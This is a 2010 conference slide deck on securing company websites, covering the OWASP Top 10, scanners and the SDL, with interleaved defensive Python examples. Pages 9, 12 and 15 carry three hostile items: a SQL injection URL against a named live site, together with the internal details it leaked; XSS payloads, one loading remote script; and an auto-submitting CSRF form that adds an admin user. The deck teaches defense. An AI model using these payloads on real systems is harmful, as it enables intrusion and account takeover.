
Page 1

Securing Your Company’s Web Presence

Russ McRee, Microsoft

Holisticinfosec.org

ISACA Puget Sound Meeting

3/16/2010

Common security threats to your web presence & what you can do about it

Page 2

Securing your company’s web presence

• Understand the current state of security in the Web 2.0 world

• Common vulnerabilities and how easily hackers can exploit them

• Review common tools available for developers, auditors, managers, & security assessors

• Utilize frameworks (such as OWASP) to assess and prevent common vulnerabilities

AGENDA

Page 3

State of the Web 2.0 Union

• 83% of websites have had at least one serious vulnerability

• 64% of websites currently have at least one serious vulnerability

• 61% vulnerability resolution rate, with 8,902 unresolved issues remaining (39%)

• Average # of serious severity unresolved vulnerabilities per website: 6.5

Source: WhiteHat Security

Page 4

State of the Web 2.0 Union

Page 5

State of the Web 2.0 Union

• Web malware – Gumblar

• Gumblar is a botnet that infects Web servers and, through them, the visitors of the infected Web sites, for the purpose of installing malcode on personal computers (PCs) that redirects end-user Google searches to fraudulent Web sites. It also looks for FTP credentials on the PC and may use them to compromise additional Web sites.

• Malicious online advertisements – Malicious advertisers purchase ad time in online streams or compromise existing aggregators

Source: WhiteHat Security

Page 6

Common vulns and ease of exploit

Source: OWASP Top 10

Page 7

Common vulns and ease of exploit

2010 CWE/SANS Top 25 Most Dangerous Programming Errors

Page 8

Common vulns and ease of exploit

• Injection

– SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query.

– The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

Source: OWASP Top 10

Page 9

Common vulns and ease of exploit

• SQL injection

– Good:

• http://festivalbar.it.msn.com/news/index.php?id=2

– Not good at all:

• http://festivalbar.it.msn.com/news/index.php?id=-1 union select 1,concat_ws(0x3a,user(),@@version,database()),3,4,5,6,7,8,9,10,11--

– User = FBAR_FB002

– Host private IP = 192.168.111.119

– MySQL version = 4.1.22

– Database = FBAR_WWW
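The two slides above (the OWASP definition of injection and the `id=-1 union select ...` URL) are the whole story of a numeric-id injection: the untrusted `id` is pasted into the query text, so the interpreter happily runs the attacker’s UNION. The following is an added example, not code from the talk or from the site shown; it uses a constructed SQLite database (tables `news` and `app_config`, the row contents and the `lookup_*` function names are all made up for illustration) and rewrites the slide’s payload against SQLite’s `sqlite_version()` in place of MySQL’s `user()`/`@@version`/`database()`. The vulnerable lookup leaks the second table; the parameterized lookup validates the type and binds the value, so the SQL text never changes.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the news table behind a page like index.php?id=N."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "Festival opens", "Gates open at noon."),
         (2, "Line-up announced", "Headliners confirmed.")],
    )
    # A second table the news page was never meant to expose (constructed data).
    conn.execute("CREATE TABLE app_config (name TEXT, value TEXT)")
    conn.execute("INSERT INTO app_config VALUES ('db_user', 'constructed_user')")
    return conn


def lookup_vulnerable(conn, raw_id):
    """String concatenation: the interpreter parses whatever the client sent as SQL."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Validate the type, then bind the value as a parameter; the query text is fixed."""
    try:
        news_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # reject anything that is not a plain integer id
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()


# The slide's "-1 union select ..." pattern, adapted to SQLite: a non-matching id
# followed by a UNION with the same column count as the legitimate SELECT.
UNION_PAYLOAD = "-1 UNION SELECT 1, sqlite_version(), value FROM app_config"


if __name__ == "__main__":
    db = make_db()
    # Vulnerable path: one row comes back, and it is not a news row at all.
    print("vulnerable   :", lookup_vulnerable(db, UNION_PAYLOAD))
    # Parameterized path: the payload is not an integer, so nothing is queried.
    print("parameterized:", lookup_parameterized(db, UNION_PAYLOAD))
    # Normal use still works.
    print("parameterized:", lookup_parameterized(db, "2"))
```

The defender’s takeaway is the shape of `lookup_parameterized`: a type check at the trust boundary plus a bound parameter. Scanners such as the ones listed later in the deck find the `lookup_vulnerable` shape precisely because a single crafted `id` changes the result set in a way a normal integer never can.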

Page 10

Common vulns and ease of exploit

SQL injection video demo

festivalbar.it.msn.com

Page 11

Common vulns and ease of exploit

• Cross-site scripting (XSS)

– XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping

– XSS allows attackers to execute script in the victim’s browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites

Source: OWASP Top 10

Page 12

Common vulns and ease of exploit

• Cross-site scripting (XSS)

– Good

• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b604491e163632

– Bad

• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script>alert(document.cookie)</script>4491e163632

– Really bad

• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script src=http://holisticinfosec.org/js/warning.js></script>4491e163632
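The XSS definition and the three `keywords=` URLs above show a reflected flaw: the search term is echoed into the results page, so a `<script>` in the parameter becomes a `<script>` in the page. The following is an added example, not code from the talk or from eclime/osCommerce; the results template, the `render_*` function names and the response-header policy are assumptions made for this illustration. It shows the vulnerable reflection beside the escaped one, using the slide’s own “Bad” input, and adds the defense-in-depth headers a practitioner would pair with escaping: a Content-Security-Policy that blocks inline and third-party script, and an HttpOnly session cookie so `document.cookie` has nothing to hand over.

```python
import html

# Constructed search-results template standing in for advanced_search_result.php.
PAGE = "<html><body><h2>Results for: {kw}</h2><p>No products found.</p></body></html>"


def render_vulnerable(keywords):
    """Reflects the raw parameter into the HTML body: markup in the input stays markup."""
    return PAGE.format(kw=keywords)


def render_escaped(keywords):
    """Escapes for the HTML-body context: <, >, &, and quotes become character references."""
    return PAGE.format(kw=html.escape(keywords, quote=True))


def response_headers():
    """Assumed defense-in-depth policy for this example (not the product's own headers).

    CSP: only same-origin script files may run, so an inline <script> or a
    <script src=http://other-host/...> injected by an escaping bug is blocked.
    HttpOnly: the session cookie is not readable from script at all.
    """
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": "session=constructed-session-id; HttpOnly; Secure; SameSite=Lax",
    }


def has_script_element(markup):
    """Crude check used only to compare the two renderings: is a <script> tag present?"""
    return "<script" in markup.lower()


# The slide's "Bad" input: a script tag spliced into an otherwise ordinary keyword.
PAYLOAD = "Hdmi81b60<script>alert(document.cookie)</script>4491e163632"


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("escaped   :", render_escaped(PAYLOAD))
    print("headers   :", response_headers())
```

Escaping is context-specific: `html.escape` is right for text between tags and inside quoted attribute values, but a value placed inside a `<script>` block, a URL, or a CSS property needs that context’s own encoding. The ordinary keyword from the “Good” URL renders identically either way, which is the check to run when adding escaping to an existing page.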

Page 13

Common vulns and ease of exploit

XSS video demo

eclime 1.0.9b (osCommerce fork)

Page 14

Common vulns and ease of exploit

• Cross-site request forgery (CSRF)

– A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other authentication information, to a vulnerable web application

– This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim

Source: OWASP Top 10

Page 15

Common vulns and ease of exploit

• Cross-site request forgery

<html>
<form name="createID"
      action="http://192.168.248.102/oscommerce/catalog/admin/administrators.php?action=insert"
      method=Post AUTOCOMPLETE="off">
<input type="hidden" name="username" value="frank">
<input type="hidden" name="password" value="test">
<input type="hidden" name="x" value="">
<input type="hidden" name="y" value="">
</form>
<script>
window.setTimeout(function() {
  document.createID.submit();
}, 3000);
</script>
<h1>Adding an osCommerce admin user...</h1>
</html>
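The auto-submitting form above works because the browser attaches the admin’s session cookie to the forged POST and the application treats the cookie alone as proof of intent. The following is an added example, not code from the talk or from osCommerce; the session store, the handler name `handle_admin_insert` and its inputs are assumptions made for this illustration. It shows the synchronizer-token defense the OWASP guidance describes: the server issues a per-session random token, embeds it in its own forms, and rejects any state-changing request that does not echo it back. A cross-site form cannot read the token, so the forged request from the slide fails even though the cookie rides along.

```python
import hmac
import secrets

# Constructed server-side session store: session cookie value -> session state.
SESSIONS = {}


def login(username):
    """Creates a session and a per-session CSRF token (synchronizer token pattern)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """What the server embeds as a hidden field in the forms it renders itself."""
    return SESSIONS[sid]["csrf"]


def handle_admin_insert(cookies, form):
    """State-changing handler (stand-in for administrators.php?action=insert).

    Returns (status, message). Only a request carrying both the session cookie
    and the token rendered into the application's own form is accepted.
    """
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    expected = session["csrf"].encode()
    supplied = form.get("csrf_token", "").encode()
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(expected, supplied):
        return 403, "csrf check failed"
    return 200, f"admin user {form['username']} created"


if __name__ == "__main__":
    sid = login("alice")
    # The slide's auto-submitting form: the cookie rides along, but there is no token.
    print(handle_admin_insert({"session": sid},
                              {"username": "frank", "password": "test"}))
    # The application's own form carries the token the server rendered into it.
    print(handle_admin_insert({"session": sid},
                              {"username": "frank", "password": "test",
                               "csrf_token": csrf_token_for(sid)}))
```

Two usage points: the token must be tied to the session (a global constant would be readable by anyone who can load a page), and the check belongs on every request that changes state, not only on the login form. Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, since the browser then withholds the cookie from cross-site POSTs in the first place.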

Page 16

Common vulns and ease of exploit

CSRF video demo

osCommerce

Page 17

Common tools – commercial

• Acunetix WVS by Acunetix

• AppScan by IBM

• Burp Suite Professional by PortSwigger

• Hailstorm by Cenzic

• MileScan Web Security Auditor by MileSCAN Technologies

• N-Stalker by N-Stalker

• NetSparker by Mavituna Security

• NeXpose by Rapid7

• NTOSpider by NTObjectives

• Retina Web Security Scanner by eEye Digital Security

• SecurityQA Toolbar by iSEC Partners

• WebApp360 by nCircle

• WebInspect by HP

Source: WASC Scanner List

Tools I’ve used

Page 18

Common tools – SaaS

• AppScan OnDemand by IBM

• ClickToSecure by Cenzic

• QualysGuard Web Application Scanning by Qualys

• Sentinel by WhiteHat

• Veracode Web Application Security by Veracode

• WebInspect by HP

Source: WASC Scanner List

Tools I’ve used

Page 19

Common tools – Free/Open Source

• Burp Suite by PortSwigger

• Grabber by Romain Gaucher

• Grendel-Scan by David Byrne and Eric Duprey

• Nikto/Wikto

• Paros by Chinotec

• Powerfuzzer by Marcin Kozlowski

• SecurityQA Toolbar by iSEC Partners

• TamperData

• W3AF by Andres Riancho

• Wapiti by Nicolas Surribas

• Watcher & Fiddler

Source: WASC Scanner List

Tools I’ve used

Page 20

Tools – Burp & Tamper Data

Burp or Tamper Data demo

Page 21

Frameworks

• Audit against OWASP Top 10 and CWE/SANS Top 25

• Now balance those against compliance requirements

• You’re the auditors, you tell me ;-)

– PCI

– HIPAA

– SOX

– GLBA

Page 22

Frameworks

• Security Development Lifecycle (SDL)

– Incorporates comprehensive security and privacy protections for online services and Web applications. Includes requirements that address widely exploited classes of Web vulnerabilities, including XSS, SQL injection, and CSRF among others.

• Applies to large, medium and small organizations

• Applies to various development methodologies

• Applies to any platform

Page 23

Frameworks

• SDL Threat Modeling

– Classic software threat modeling

– Infrastructure threat modeling

Page 24

Resources

• OWASP Top 10

– http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

• 2010 CWE/SANS Top 25 Most Dangerous Programming Errors

– http://cwe.mitre.org/top25/

• 8th WhiteHat Website Security Statistics Report

– http://www.slideshare.net/jeremiahgrossman/whitehat-security-8th-website-security-statistics-report-2494163

Page 25

Resources

• SDL

– http://www.microsoft.com/security/sdl/default.aspx

• Infrastructure Threat Modeling

– http://technet.microsoft.com/en-us/library/dd941826.aspx

• SDL Threat Modeling Tool

– http://www.microsoft.com/downloads/details.aspx?FamilyID=A48CCCB1-814B-47B6-9D17-1E273F65AE19&displayLang=en

• Toolsmith

– http://holisticinfosec.org/content/view/12/26/

Page 26

Resources

• WebGoat

– http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

Page 27

Russ McRee

russ at holisticinfosec dot org

rmcree at microsoft dot com

ISACA Puget Sound Meeting

3/16/2010

QUESTIONS?